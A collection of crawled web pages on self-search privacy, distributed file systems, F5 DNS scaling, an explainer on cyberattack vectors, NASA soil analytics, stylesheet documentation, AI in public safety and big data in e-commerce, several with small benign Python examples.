image that concerns you, you can run a reverse image search to see where it’s hosted. To do this, follow these steps: - Open Google Image Search and click the Camera icon in the search bar - Paste a link to the image or upload the image you want to search for. - Your results will be shown as a combination of images and relevant websites. If an exact match is found, it will populate at the top of your results. If the image has no text on it or any identifying information, don’t worry. Your image can turn up even if it only has your face. Where you are and where you’ve been Next, you’ll want to run a search for your past and current email addresses and phone numbers. This helps you see which sites have access to this personal data and will also show you what others can find if they look this information up. If you’ve ever signed up for a discussion board or forum with your personal email address, your post history could easily show up if someone Googles you. The same can be said for social media pages and blogs. Find and make note of any posts or content that you’d prefer to make private. Finally, run a search for your social media account usernames. Try to remember any usernames you may have used online and look those up. For example, if you search for the username “kimkomando,” you’ll turn up Kim’s Facebook, Twitter, Pinterest and Instagram accounts. 
If you can’t remember, try searching for your name (as an exact phrase in quotation marks) plus the social network you want to look up. This might reveal accounts that you forgot about or that are less private than you think. If your real name is visible anywhere, it probably falls into this category. Keep track going forward If you want to stay on top of information that pops up about you on social media (or the rest of the web), you can set up a free Google Alert for your name. It’s an easy way to keep tabs on your online reputation. Here’s how to set up a Google Alert for your name: - Visit Google.com/alerts and type what you want Google to alert you about in the search bar. - Click Show options to change settings for frequency, sources, language and region. You can also specify how many results you want and where you want them delivered. - Click Create Alert to start receiving alerts on yourself or other search topics you’re interested in. Bonus: What does Google know about me? And last but not least, let’s take a moment to address data that Google itself keeps on you. By default, Google records every search you enter, your location (if you use Google Maps), video-watching history and searches from YouTube, and much more. Anyone who knows your Google Account email and digs deep enough can learn plenty about your online activities. If you haven’t visited your Google Account and privacy settings in a while, now’s the time to do it. Now that you’ve searched for yourself and taken note of content that people can see if they look you up, it’s time to take things a step further and actually remove any data that you don’t want public. Want to know how? Just follow along for part two of our guide to Google-searching yourself.
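Because exact-phrase searches and name-plus-modifier searches can add up to a lot of typing, here is a small, optional Python sketch that simply builds the quoted Google search URLs described above so you can open them in a browser. The name and modifiers in the example are hypothetical placeholders.

```python
# Build exact-phrase Google search URLs for a name plus optional modifiers (illustrative only).
from urllib.parse import quote_plus

def search_urls(full_name: str, modifiers=()):
    """Return Google search URLs: the quoted name alone, then the name with each modifier."""
    queries = [f'"{full_name}"'] + [f'"{full_name}" {m}' for m in modifiers]
    return [f"https://www.google.com/search?q={quote_plus(q)}" for q in queries]

# Hypothetical example: your name plus the kinds of modifiers suggested above.
for url in search_urls("Jane Q. Public", ["Springfield", "Acme Corp", "LinkedIn"]):
    print(url)
```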
<urn:uuid:5174558b-feef-48e5-ba18-4aeec489738a>
CC-MAIN-2022-40
https://www.komando.com/privacy/why-you-should-google-yourself-now/311115/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00668.warc.gz
en
0.909188
1,214
2.53125
3
In general, distributed file systems are IT solutions that allow multiple users to access and share data in what appears to be a single, seamless storage pool. The back-end systems that enable them follow one of a few architectural patterns: client-server, which tends to be the most common; cluster-based architectures, which are most useful in large data centers; and decentralized file systems. These architectures comprise multiple back-end systems connected via a network, with middleware orchestrating file storage and employing many techniques to ensure the "distributed" system's performance meets the needs of users. In this way, the distributed system has a service capacity, and the load on that service is the total demand from all active users. When load approaches or exceeds that capacity, system performance degrades, showing up as lag or service outages. The chief benefit rests on the fact that sharing data is fundamental to distributed systems and therefore forms the basis for many distributed applications. Specifically, distributed file systems are a proven way to securely and reliably accommodate data sharing between multiple processes over long periods. This makes them ideal as a foundational layer for distributed systems and applications. Distributed systems form the modern concept of "the cloud" and support the idea that the cloud is essentially limitless in storage capacity. These systems can expand behind the scenes to match any growth in demand. They can manage massive volumes of information, safeguard its integrity, and ensure its availability to users 99.9995% of the time. And for that small sliver of downtime, there are contingencies upon contingencies in place. For cloud data centers, this is their business, so they are able to benefit from economies of scale more readily than enterprises or smaller businesses that deploy their own distributed systems. Enterprises and small businesses may deploy their own distributed file systems to facilitate business operations regionally, even globally. For instance, distributed systems may support private clouds, parallel computing, even real-time control systems. Municipalities deploy real-time traffic control and monitoring systems to better manage commute times, all made possible by DFS-supported applications. Sophisticated parallel computing models are deployed across many participating computing systems in collaborations that help compute large data sets, as in astronomical calculations where one computer simply won't do the work.
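To make the capacity-versus-load idea above concrete, here is a minimal, illustrative Python sketch (not tied to any particular file system) that models a service with a fixed request capacity and flags when aggregate demand pushes utilization into the range where lag or outages become likely. The numbers and thresholds are hypothetical.

```python
# Toy model of distributed file system load vs. capacity (illustrative only).

def utilization(capacity_rps: float, user_demands_rps: list[float]) -> float:
    """Return aggregate load as a fraction of total service capacity."""
    total_load = sum(user_demands_rps)
    return total_load / capacity_rps

def health_status(util: float) -> str:
    # Thresholds are arbitrary examples, not vendor guidance.
    if util < 0.7:
        return "healthy"
    if util < 1.0:
        return "degraded: expect rising latency"
    return "overloaded: expect lag or service outages"

if __name__ == "__main__":
    capacity = 50_000                        # requests/second the cluster can serve
    demands = [1_200, 4_500, 9_800, 30_000]  # per-tenant demand, requests/second
    u = utilization(capacity, demands)
    print(f"utilization: {u:.0%} -> {health_status(u)}")
```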
<urn:uuid:9052cdd2-6c1a-4af7-b00c-6d9741e6f5f6>
CC-MAIN-2022-40
https://www.hitachivantara.com/en-anz/insights/faq/what-is-a-distributed-file-system.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00668.warc.gz
en
0.945147
476
2.953125
3
The Domain Name System (DNS) was created in 1983 to enable people to easily identify all the computers, services, and resources connected to the Internet by name—instead of by Internet Protocol (IP) address, a hard-to-memorize string of numbers. A DNS server translates the domain names you type into a browser into an IP address, which allows your device to find the service or site you're looking for on the Internet. Arguably the primary technology enabling the Internet, DNS is also one of the most important components in networking infrastructure. In addition to delivering content and applications, DNS also manages a distributed and redundant architecture to ensure high availability and fast user response time—so it is critical to have an available, intelligent, secure, and scalable DNS infrastructure. If DNS goes down, most web applications will stop working properly, affecting your business—and your brand. F5's end-to-end Intelligent DNS Scale reference architecture enables organizations to build a strong DNS foundation that maximizes resources and improves service management, while remaining agile enough to support both existing and future network architectures, devices, and applications. When a user requests a web page, that request is passed to a local DNS server, which in turn communicates with the main DNS servers. Everything works well until a traffic surge or an attacker floods the server with DNS query requests. If your main DNS server gets overloaded, it will stop responding, which can render your website unavailable. DNS failures account for 41 percent of web infrastructure downtime, so it's essential to keep your DNS available. According to a survey by the Aberdeen Group, organizations lose an average of $138,000 for every hour their data centers are down. Downtime negatively affects customers, can lead to loss of revenue, and can even affect employees trying to access corporate resources, such as email. That's why the importance of a strong DNS foundation can't be overstated. Without one, your customers may not be able to access your content and applications when they want to—and if they can't get what they want from you, they'll likely go elsewhere. There are many reasons why DNS requirements are growing so quickly. Over the last five years, the number of internet users has grown by 82 percent; the number of websites has grown from approximately 580 million to 1.24 billion; and the number of DNS queries has grown by more than 100 percent. In addition, the number of mobile connections in use grew by 2.2 billion, and nearly 60 percent of web users say they expect a website to load on their mobile phone in three seconds or less. Organizations are experiencing rapid growth in terms of applications as well as the volume of traffic accessing those applications. Plus, the web applications themselves are growing and continually becoming more complex. Every icon, URL, and piece of embedded content on a web page requires a DNS lookup. Loading complex sites may require hundreds of DNS queries, and even simple smartphone apps can require numerous DNS queries just to load. In the last five years, the volume of DNS queries for .com and .net addresses has more than doubled, increasing to an average daily query load of 124 billion in the first quarter of 2016. In the same timeframe, more than 10 million domain names were added to the internet. Future growth is expected to occur at an even faster pace as more cloud implementations are deployed.
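As a quick illustration of the name-to-address translation described above, the following Python sketch resolves a hostname using only the standard library; it simply asks whatever resolver the operating system is configured to use, and the hostname shown is just an example.

```python
# Resolve a hostname to IP addresses using the OS-configured DNS resolver.
import socket

def resolve(hostname: str) -> list[str]:
    """Return the unique IP addresses the resolver reports for a hostname."""
    infos = socket.getaddrinfo(hostname, None)
    return sorted({info[4][0] for info in infos})

if __name__ == "__main__":
    name = "www.example.com"  # example hostname
    print(name, "->", resolve(name))
```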
If DNS is the backbone of the Internet—answering all the queries and resolving all the numbers so you can find your favorite sites—it's also one of the most vulnerable points in your network. Due to the crucial role it plays, DNS is a high-value target for attackers. DNS DDoS attacks can flood your DNS servers to the point of failure, or hijack and redirect requests to a malicious server. To prevent this, a distributed, high-performing, secure DNS architecture and DNS offload capabilities must be integrated into the network. Generally, organizations have a set of DNS servers, each one capable of handling up to 150,000 DNS queries per second. High-performance DNS servers can handle around 200,000 queries per second. The bad guys can easily exceed those rates, as exemplified by DNS outages affecting Dyn, The New York Times, LinkedIn, Network Solutions, and Twitter. To address DNS surges and DNS DDoS attacks, companies add more DNS servers, which are not really needed during normal business operations. This costly solution also often requires manual intervention for changes. In addition, traditional DNS servers require frequent maintenance and patching, primarily for new vulnerabilities. When looking for DNS solutions, many organizations select BIND (Berkeley Internet Name Domain), the Internet's original DNS resolver. Installed on approximately 80 percent of the world's DNS servers, BIND is an open-source project maintained by the Internet Systems Consortium (ISC). ISC is a non-profit organization with a for-profit consulting arm called DNS-CO, which offers four different levels of subscriptions and support services. Despite its popularity, BIND requires significant maintenance multiple times a year, primarily due to vulnerabilities, patches, and upgrades. It can be downloaded freely, but it needs servers (an additional cost, including support contracts) and an operating system. In addition, BIND typically scales to only 50,000 responses per second (RPS), making it vulnerable to both legitimate and malicious DNS surges. The F5 Intelligent DNS Scale reference architecture provides a smarter way to respond to and scale for DNS queries, taking into account a variety of network conditions and situations to distribute user application requests and application services based on business policies, data center conditions, network conditions, and application performance. Instead of worrying about DNS outages and purchasing additional DNS infrastructure to combat surges, you can install an F5 BIG-IP device in your network's DMZ and let it handle requests on behalf of your main DNS server. BIG-IP DNS hyperscales to 100 million RPS, which means that even large surges of DNS requests (including the malicious ones) won't disrupt your content or affect the availability of critical applications. Your network administrators can rest easier, knowing that your site will respond to all DNS queries and remain available even during an attack. Your brand is protected, and your company can avoid an embarrassing front-page story.
BIG-IP DNS only has to open the DNS query packet once, as long as the request is for an address that's in the zone that was transferred to DNS Express, simplifying the process and significantly improving the performance and response times of your DNS architecture. With DNS Express, each individual core of a BIG-IP device can answer approximately 125,000 to 200,000 requests per second, scaling up to more than 50 million query RPS, greater than 12 times the capacity of a typical primary DNS server. Each BIG-IP device is ICSA Labs Certified as a network firewall. By intelligently evaluating the reputation of Internet hosts, the BIG-IP device can prevent attackers from knocking your DNS offline with a DNS DDoS attack, stealing data, compromising corporate resources, or otherwise disrupting your business. In addition, DNSSEC can protect your DNS infrastructure, including cloud deployments, from cache poisoning attacks and domain hijacks. With DNSSEC support, you can digitally sign your DNS zones and responses, enabling the resolver to verify the authenticity of each response and preventing DNS hijacking and cache poisoning. The F5 IP Intelligence service enhances your overall security by denying access to IP addresses known to be infected with malware, in contact with malware distribution points, or with poor reputations. The F5 Intelligent DNS Scale reference architecture also helps keep your content and applications available by responding to DNS queries from the edge of the network, rather than from deep within your critical infrastructure. When you offload DNS responses to the BIG-IP platform, requests don't reach the back end of your network, which greatly increases your ability to scale and respond to DNS surges while protecting your DNS infrastructure. By increasing the speed, availability, scalability, and security of your DNS infrastructure, the F5 Intelligent DNS Scale reference architecture makes sure your customers and employees can access your critical web, application, and database services whenever they need them. This also applies to cloud deployments or infrastructures where DNS is distributed. Organizations can replicate their high-performance DNS infrastructure in almost any environment. They may have cloud DNS for disaster recovery/business continuity, or even a cloud DNS service with signed DNSSEC zones. F5 DNS Services' enhanced AXFR support offers zone transfers from a BIG-IP device to any DNS service, enabling organizations to replicate DNS in physical, virtual, and cloud environments. The DNS replication service can be sent to other BIG-IP devices or other general DNS servers in data centers or clouds that are closest to the users. In addition, organizations can send users to a site that will give them the best experience. BIG-IP DNS services use a range of load balancing methods and intelligent monitoring for each specific app and user. Traffic is routed according to your business policies, as well as current network and user conditions. BIG-IP DNS services include an accurate, granular geolocation database, giving you control of traffic distribution based on user location. BIG-IP DNS is a global DNS solution, providing name services at the very edge of your service delivery and access networks. By employing geographic location services, it can direct users to the best service delivery data center based on their physical location.
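To put the quoted throughput figures in perspective, here is a simple back-of-the-envelope Python calculation, using the per-server rates mentioned earlier purely as inputs, that estimates how many conventional DNS servers a hypothetical query surge would require. It is illustrative arithmetic, not a sizing guide.

```python
# Rough surge-sizing arithmetic (illustrative only).

surge_qps = 5_000_000           # hypothetical surge: 5 million queries/second
typical_server_qps = 150_000    # capacity of a typical DNS server (figure from the text)
high_perf_server_qps = 200_000  # capacity of a high-performance DNS server (figure from the text)

def servers_needed(load_qps: int, per_server_qps: int) -> int:
    # Round up: a partially loaded server is still a server you must run.
    return -(-load_qps // per_server_qps)

print("typical servers needed:", servers_needed(surge_qps, typical_server_qps))
print("high-performance servers needed:", servers_needed(surge_qps, high_perf_server_qps))
```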
BIG-IP DNS provides a range of name services. Within the data center, BIG-IP Local Traffic Manager (LTM) can ensure that your applications and content remain highly available by creating a fault-tolerant architecture from the mobile edge through to the service. In addition to providing high availability, BIG-IP LTM also supports service provider-specific applications, such as load balancing ENUM requests for SIP transactions, and offers its own set of solutions for naming services. The F5 Intelligent DNS Scale reference architecture adjusts for high-availability and high-volume applications while simultaneously supporting millions of user requests per second. These components work together with other BIG-IP service delivery features, such as the iRules scripting language, transparent application monitoring, and other IP-related services, to create a complete service delivery infrastructure: the F5 Service Delivery Network. Seamless scale and flexibility are achieved by leveraging the intelligent service delivery platform common to all BIG-IP devices. By using the F5 Intelligent DNS Scale reference architecture, organizations can realize all of these benefits: it is an end-to-end DNS delivery solution that improves web performance by reducing DNS latency, protects your web properties and brand reputation by mitigating DNS DDoS attacks, and reduces data center costs by consolidating DNS infrastructure. Most importantly, it directs your customers to the best performing components for optimal application and service delivery. The F5 Intelligent DNS Scale reference architecture also delivers the peace of mind that comes with knowing that your web applications will respond to all DNS queries—keeping your content and applications available to your users wherever and whenever they want to access them.
<urn:uuid:a9468a99-0fe8-4ad2-98e9-83c7bf38386f>
CC-MAIN-2022-40
https://www.f5.com/ja_jp/services/resources/white-papers/the-f5-intelligent-dns-scale-reference-architecture
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00068.warc.gz
en
0.92597
2,342
2.890625
3
What are attack vectors? How are they used? May 7, 2021 Last week we did a deep dive into data collection and how that data travels through the MACeBox and winds up at MACeHome. Now that it's here, we need to begin building out our threat intelligence so that we can identify threats and respond accordingly. There are a few different ways that we can do this, such as monitoring commonly known attack vectors, continually building out Indicators of Compromise (IoC) and Indicators of Attack (IoA), running data through ML models to look for correlations, and, most importantly, utilizing the knowledge, experience, and passion of our human threat hunting team. Ok, I just threw a bunch of words at you, so let's start at the top of the list by looking at attack vectors. What are they, how do hackers use them, what kind of impact can they have, and how can we use those same vectors against the threat? Wow, those are some great questions. You're on top of it today. What are Attack Vectors? If you're familiar with aviation or maritime practices, vectors are headings and paths that can help a plane or ship determine its course of travel or distinguish between moving and stationary objects to avoid collisions. In cybersecurity, attack vectors function in a similar way - paths that an attacker can choose to take to avoid being noticed. Attack vectors are the different methods that malicious actors use to force their way in and spread through your network by finding, or in some cases creating, a literal hole in your defense. Attack vectors come in a lot of shapes and sizes. Here's a very small fraction of the types of vectors at a hacker's disposal: - Software vulnerabilities (zero-day, injection, broken access control, XSS) - Compromised credentials - Weak passwords - APT (Advanced Persistent Threat) How do hackers use Attack Vectors? Let's take a look at a few of the examples from above. Weak passwords are like word searches for threat actors - keep looking and eventually you come across one you know. Distributed Denial of Service (DDoS) attacks are used to disrupt the normal traffic on a server by overloading it with requests. Software vulnerabilities, like cross-site scripting, broken access control, and unpatched zero-day exploits, are common attack vectors used by malicious actors to infiltrate your network. And of course, let's not forget about that generous Nigerian prince who is awaiting your reply in order to deposit $1m USD into your bank account - just let him know where he needs to deposit the funds. What kind of impact can Attack Vectors have? In the above examples, it all comes down to PPT (no, not PowerPoint files): People, Processes, and Technology. Back in March, the California State Controller's Office was hit by a phishing attack where an employee clicked on a malicious link, "logged in" to the imposter site, and inadvertently allowed a hacker access to their email for about 24 hours. This gave the hacker the ability to view PII from the Unclaimed Property Holder Report as well as the opportunity to fire off more phishing emails to the user's contacts, making the other malicious emails seem even more legitimate. This is why it's important to train your people on the attack vectors that will impact them. Just a couple of weeks ago, a security researcher found that an unsecured Experian API allowed anyone to access the private credit scores of tens of millions of Americans just by entering a few easy-to-find parameters. While this may not seem like a big deal, hackers now know who is worth their time.
If the standard process for securing those APIs had been followed, this would not have been the case. When it comes to technology, just take a look at SolarWinds or the Microsoft Exchange attacks. The vulnerabilities were known, patches were pushed out, and organizations sat on this information while nation-states were quick to move in and target those who were unable to respond, costing companies billions of dollars across ransoms, legal proceedings, PR nightmares, lost sales revenue due to lost trust, and repercussions for employees and customers. People, process, and technology are the three pillars of attack vectors that hackers focus on when planning and executing their attack. How do we use Attack Vectors against malicious actors? As I mentioned before, a vector is a path or bearing between two points. If you know that path (and we know those paths), then you can trace the line until you find the breach. Or, if you have enough data (pssst, we covered that last week - to the tune of billions of data points per week), you can get there even faster by triangulating their position. This is our concept of creating haystacks and then looking for the elusive needle. By understanding the common and emerging attack vectors, we can find clues in the data that we gather to build out our threat intelligence, so that you can rest assured that we keep your data safe. After all, we're Milton Security. Obviously, we protect your brand. Stay tuned, because next week we'll dive into IoC and IoA and how the ML models we use help us quickly identify suspicious activity.
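As a concrete, deliberately simplified illustration of finding clues in collected data, the sketch below scans hypothetical log records against a short list of known-bad IP addresses, a toy stand-in for the kind of indicator matching described here. The indicators, log format and field names are invented for the example.

```python
# Toy indicator-of-compromise matching over log records (illustrative only).

KNOWN_BAD_IPS = {"203.0.113.7", "198.51.100.23"}  # hypothetical indicators

logs = [
    {"ts": "2021-05-07T10:14:02Z", "src_ip": "192.0.2.10", "action": "login"},
    {"ts": "2021-05-07T10:15:44Z", "src_ip": "203.0.113.7", "action": "login_failed"},
    {"ts": "2021-05-07T10:16:01Z", "src_ip": "203.0.113.7", "action": "login"},
]

def find_hits(records, bad_ips):
    """Return records whose source IP matches a known indicator."""
    return [r for r in records if r["src_ip"] in bad_ips]

for hit in find_hits(logs, KNOWN_BAD_IPS):
    print("ALERT:", hit["ts"], hit["src_ip"], hit["action"])
```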
<urn:uuid:78a395fc-9136-49e7-b3ca-55748596fb77>
CC-MAIN-2022-40
https://www.miltonsecurity.com/company/blog/what-are-attack-vectors
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00068.warc.gz
en
0.95177
1,148
3.28125
3
NASA data is powering soil analytics that can deliver accurate and scalable irrigation and fertilization metrics and enable research into sustainability and the impact of extreme weather events. The Harvest Consortium, part of NASA's Food Security and Agriculture program, is partnering with CropX, a soil analytics firm, to gain advanced insights for global agricultural monitoring. CropX uses 18-inch in-ground soil sensors that collect and geo-tag moisture, temperature and salinity data at multiple depths. Data from the soil sensors, precise weather and evaporation forecasts, satellite images and other moisture-related data are fed into the company's crop models to show how water, nutrients and salinity levels affect the development of specific crops. The soil intelligence platform's machine learning algorithms are constantly refined based on the actual growth of the crops. The in-ground sensors are a key data source. "Most agricultural companies rely on above-ground data such as satellite imagery, and less than 10 percent of companies get data from within the soil, which is where the most valuable data is," Matan Rahav, director of business development at CropX, said in an Amazon Web Services case study. "By the time there are visible signs of crop stress detected from space, the damage is already done." CropX and NASA are conducting a year-long pilot across alfalfa farms in Arizona that will fine-tune the algorithms to provide accurate and scalable irrigation and fertilization metrics based on CropX's soil intelligence data and synthetic aperture radar information from NASA satellites. The integration of NASA data along with satellite data from partner agencies will help establish the parameters for water usage estimates, yield prediction, soil quality and land usage assessments based on multiple crop growing cycles. "We are in a constant race to produce and supply enough food in order to feed a rapidly growing global population, with finite land and natural resources. NASA Harvest is dedicated to collaborating with top innovators to make the best possible use of our agricultural land," NASA Harvest Program Director Inbal Becker-Reshef said. "CropX unites our space-led vision with on-farm intelligence and results." NASA data is also powering a new tool the Department of Agriculture developed to provide easy access to soil moisture data. The Crop Condition and Soil Moisture Analytics tool provides access to high-resolution data from NASA's Soil Moisture Active Passive mission and the Moderate Resolution Imaging Spectroradiometer instrument. The tool provides more thorough spatial coverage and consistency than other soil moisture measurement methods, said Rajat Bindlish, a research associate in Earth science remote sensing at NASA's Goddard Space Flight Center. The primary users of the tool will be researchers and statisticians at USDA's National Agricultural Statistics Service, who currently release weekly reports that classify states into moisture categories and track crops' health and growing progress. USDA researchers and statisticians will incorporate the tool into applications that spot flooded fields and identify conditions that might prevent planting, according to NASS Spatial Analysis Research lead Rick Mueller.
In addition to supporting agricultural operations, it will enable research into sustainability and the impact of extreme weather events, Mueller said. “These satellite-derived vegetation condition indices and soil moisture condition maps show first-hand the ever-changing landscape of U.S. agriculture.”
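As an illustration of how multi-depth soil moisture readings might feed a simple irrigation decision, here is a hedged Python sketch. The readings, depths and thresholds are invented placeholders, and real platforms such as CropX's use far richer crop models than this toy rule.

```python
# Toy irrigation-trigger logic over multi-depth soil moisture readings (illustrative only).

readings = {  # hypothetical volumetric water content (%) by sensor depth (cm)
    15: 14.2,
    30: 17.8,
    45: 21.5,
}

WILTING_POINT = 12.0   # below this, crops are stressed (example value)
FIELD_CAPACITY = 26.0  # above this, additional irrigation is wasted (example value)

def irrigation_advice(moisture_by_depth, root_zone_depths=(15, 30)):
    """Average the root-zone readings and map them to a simple recommendation."""
    zone = [moisture_by_depth[d] for d in root_zone_depths if d in moisture_by_depth]
    avg = sum(zone) / len(zone)
    if avg < WILTING_POINT:
        return avg, "irrigate now"
    if avg < (WILTING_POINT + FIELD_CAPACITY) / 2:
        return avg, "schedule irrigation soon"
    return avg, "hold off"

avg, advice = irrigation_advice(readings)
print(f"root-zone average {avg:.1f}% -> {advice}")
```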
<urn:uuid:ef616569-1a0a-45d6-9743-2732c7798c0f>
CC-MAIN-2022-40
https://gcn.com/cloud-infrastructure/2021/03/nasa-data-supports-agricultural-analytics/315988/?oref=gcn-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00068.warc.gz
en
0.891544
729
3.40625
3
Opening the Stylesheets dialog, using the Stylesheets dialog, applying a Stylesheet to a layout, creating a new Stylesheet, updating a Stylesheet, and deleting a Stylesheet. You can apply a Stylesheet to a layout in Design Mode using the Stylesheets dialog. To open the Stylesheets dialog: In layout design mode, select Stylesheets > Apply or Create a Stylesheet. Stylesheet Gallery: The left column of the Stylesheets dialog lists the available Stylesheets. Clicking a Stylesheet name displays a preview of the Stylesheet in the Preview pane. The right column lists the available commands. To apply a selected Stylesheet to a layout: Select the Stylesheet from the list and click the Apply button. The layout is updated to reflect the Stylesheet formatting. There are two ways to create a new Stylesheet. You can create a Stylesheet based on an open layout, or copy an existing Stylesheet. Copying Stylesheets lets you create variations without losing the original, and lets you modify the built-in Alpha Anywhere Stylesheets. To create a new Stylesheet based on the current layout: Click the Create New button. In the Create New Stylesheet dialog box, enter a Style Name for your new Stylesheet. To copy an existing style: In the Stylesheets dialog, select the style you want to copy. Click the Duplicate button. Enter a Style Name for the new style and click Duplicate. The new style appears in the Stylesheets dialog. You can update an existing Stylesheet to reflect the formatting of a layout. Note: Updating a Stylesheet overwrites existing properties in the Stylesheet. You cannot update system Stylesheets. To update an existing Stylesheet: In the Stylesheets dialog, select the style you want to update. Click the Update button. Alpha prompts you to make sure you want to overwrite the Stylesheet. You can delete user-created Stylesheets, but not the system Stylesheets. To delete a Stylesheet: In the Stylesheets dialog, select the style you want to delete. Click the Delete button. Alpha prompts you to make sure you want to delete the Stylesheet.
<urn:uuid:c38f7f73-4395-4b2c-a5a3-fa1d2ff17929>
CC-MAIN-2022-40
https://documentation.alphasoftware.com/documentation/pages/Guides/Desktop/Design/View/CSS/Stylesheets%20Dialog.xml
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00068.warc.gz
en
0.655328
498
2.515625
3
With artificial intelligence, public-safety organizations can reduce the labor associated with mundane security tasks and leverage human skills such as creativity, strategic thinking and interpersonal communication. Many people who work in the state and local government security space are wary about the impact of artificial intelligence on their jobs. They know the technology has the potential to help automate their systems but also worry about how it might impact the human workforce. On the surface, this seems like a legitimate concern -- the idea of a computer doing what a human can do in a fraction of the time and for less money is worrying to many people. However, there are many other factors that should be considered. When people are stuck performing mundane security tasks like watching camera feeds, monitoring social media activity or physically checking the same areas of a facility repeatedly, they can’t leverage valuable human skills such as creativity, strategic thinking and interpersonal communication. Because AI systems can now take on the bulk of routine monitoring and analysis work, it frees up human capital to be used more effectively by state and local governments looking to better honor their commitment to citizen safety. In other words, AI enables organizations to better utilize human potential by providing a more cerebral role for security operators. Many state and local agencies face challenges to implementing AI due to a widespread misunderstanding of how AI functions. Many who think of artificial intelligence picture a dystopian future of evil robots, slowly but surely becoming smarter than humans and eventually taking over. Because of this perception, agencies often face public pushback. While there is some potential for irresponsible applications of AI, the overwhelming majority of use cases are harmless. The technology is most commonly used to automate repetitive processes that don’t need 24/7 attention from a human -- such as data entry or monitoring RSS feeds for potential security threats or other risks. It’s important to remember that AI should not be used to replace a person’s role, but instead to make time for more complex tasks. Even when it comes to jobs that require human insight, there are ways that AI can help. It can quickly analyze video footage, for example, alerting command center operators to a potential threat, before automatically presenting critical information such as an exact location or a map of nearby security assets, along with step-by-step instructions for evaluation and resolution. The role of AI in public safety AI will certainly benefit all areas of public safety, especially when it comes to keeping citizens safe. Because threat scenarios vary, it can be difficult for security operators to take swift, appropriate action. Further, false alarms can be costly, and, worse, missed detections can be deadly, so control rooms operate under tremendous pressure, which in turn increases the risk for error. Fortunately, AI-powered analytics can provide continuous monitoring and real-time detection of threats. When it comes to maintaining physical security, AI analytics tools can identify unattended objects and ultimately determine the level of risk they pose. For example, an unattended glass in a bar will have a different threat rating than an unattended backpack at a subway station. 
For vehicles, AI is able to automatically cross-reference license plates with the registered make and model of a car to determine whether or not the information matches and flag suspicious activity. By implementing AI solutions, public-sector organizations can reduce costs while improving operational efficiency, enabling them to improve security in areas of need, such as placing cameras in places that lack visibility. And with new AI tools, organizations will be able to better interpret the vast amounts of data collected from existing security devices and systems that may have otherwise gone unused. Deploying AI will result in faster incident resolution, increased situational awareness and enhanced forensic capabilities. Ultimately, these tools will not take away jobs, but enhance them, especially in the state and local government space. While this could mean familiar jobs may look different in coming years, the number of new jobs made possible by the automation of repetitive tasks will grow, helping expand the workforce and enabling better public safety and security.
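To show the shape of the license-plate cross-reference described above, here is a deliberately simplified Python sketch. The plates, registration records and matching rule are all hypothetical; production systems work against live registries and must handle recognition errors, partial matches and auditing.

```python
# Toy plate/vehicle cross-check like the one described above (illustrative only).

registration_db = {  # hypothetical registration records: plate -> (make, model)
    "ABC123": ("Toyota", "Camry"),
    "XYZ789": ("Ford", "F-150"),
}

def check_vehicle(plate: str, observed_make: str, observed_model: str) -> str:
    """Compare the observed vehicle against the registration on file for its plate."""
    record = registration_db.get(plate)
    if record is None:
        return "flag: plate not found in registry"
    if record != (observed_make, observed_model):
        return (f"flag: plate registered to {record[0]} {record[1]}, "
                f"observed {observed_make} {observed_model}")
    return "ok: plate matches observed vehicle"

print(check_vehicle("ABC123", "Toyota", "Camry"))
print(check_vehicle("XYZ789", "Honda", "Civic"))
```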
<urn:uuid:7d336f9f-961b-4733-b405-ddda56faae37>
CC-MAIN-2022-40
https://gcn.com/2019/12/using-ai-as-a-workforce-multiplier/298193/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00068.warc.gz
en
0.932629
810
2.671875
3
Almost everything we do, both online and offline, is a source for data. As technology increases, the ways to measure and collect data also increase. One of the ways we understand our world is to study trends in behavior. The issue that people run into now, however, is that technology has expanded to the point where we have “too much” data. Organizing, studying and understanding this information has become even more complicated because we’re inundated with endless numbers, facts, percentages and perceptions. Big data has been a buzzword floating around the digital space for a few years now, a concept that is murky to some and not understood at all by others. So, what exactly is big data? Understanding big data Big data is the combined collection of traditional and digital data from inside and outside your company. Its purpose is to be a source of analysis and continued discovery. The introduction of big data has allowed businesses to have access to significantly larger amounts of data, all combined and packaged for analysis. This data offers insight for e-commerce businesses. E-commerce business owners can take the information from big data and use it to study trends that will help them gain more customers and streamline operations for success. 1. Increased shopper analysis Understanding shopper behavior is essential for business success. Big data is an essential component of the process, and provides information on trends, spikes in demands and customer preferences. Business owners can use that data to make sure most popular products are available and being marketed. If customers visit your site to search for products you don’t offer, big data is how you will learn about those searches, helping you seize new opportunities. In 2018, big data analysis will continue illuminating important shopper behaviors and patterns, such as popular shopping times and spikes in product searches. During this year, you will see more e-commerce businesses fine-tuning their marketing strategies, social media advertising and intuitive shopping processes to continue boosting sales and engagement in a competitive market. 2. Improved customer service 3. Easier and more secure online payments - Big data integrates all different payment functions into one centralized platform. Not only does it help with ease of use for customers, it also helps reduce fraud risks. - The advanced analytics offered by big data are powerful and intuitive enough to discover fraud in real time and to provide proactive solutions for identifying risks. - Big data can detect payment money laundering transactions that appear as legitimate payments. - Recently, payment providers have started realizing the potential of monetizing merchant analytics. Payment providers can help different merchant retailers understand their customers better. - Data analytics allows e-commerce businesses to cross sell and upsell. - Push notification-generated sales act as an effective means to validate customer data. 4. Continued advances in mobile commerce The number of people who use smartphones is increasing every day, to the point where researchers predict desktop computers will soon become obsolete. Big data makes mobility possible, especially when it comes to e-commerce. Brands can now collect data from multiple sources and analyze customers through mobile technology. Google has jumped at this trend, giving preference to sites that are mobile friendly and responsive. 
